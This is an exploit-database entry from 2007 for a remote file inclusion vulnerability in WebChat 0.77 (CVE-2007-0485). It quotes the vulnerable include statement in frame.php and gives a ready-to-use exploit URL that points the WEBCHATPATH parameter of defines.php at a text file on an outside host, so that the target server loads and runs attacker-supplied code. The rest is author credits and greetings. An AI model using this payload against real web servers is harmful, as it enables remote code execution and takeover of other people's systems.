WebChat 0.77 - 'defines.php?WEBCHATPATH' Remote File Inclusion

EKU-ID: 11150	CVE: OSVDB-36689;CVE-2007-0485	OSVDB-ID:
Author: v1per-haCker	Published: 2007-01-21	Verified:
Download:

Rating

☆☆☆☆☆

#########################################################################
#
#           [ webchat ]
#
# Class:     File Include Vulnerability
# Published  2007/1/21
# Remote:    Yes
# Critical   Level : Dangerous
# Site:      http://www.easy-script.com/compt.php?id=1705  || http://sourceforge.net/projects/webdev-webchat/
# Author:    TheViper-hacker
# Contact:   theviper-hacker@hotmail.com
#
#########################################################################
file ;
frame.php
======================================================
Vuln Code
include ($WEBCHATPATH.'language/english.php');
=======================================================
Exploit :
Http:// www.Victem.0 / [ webchat-077_path] /defines.php?WEBCHATPATH=http://turnkringonzehoop.be/viper.txt?

 ----  Thanx: [MoHaNdKo] [Cold ThreE] [cold zero] [The Wolf KSA]  ]organza[
 ---- GreeTz: All www.4azhar.Com Members Cont : rida-10@msn.com
--------------------------------------||  Viva ISLAM ||-----------------------------------------

# milw0rm.com [2007-01-21]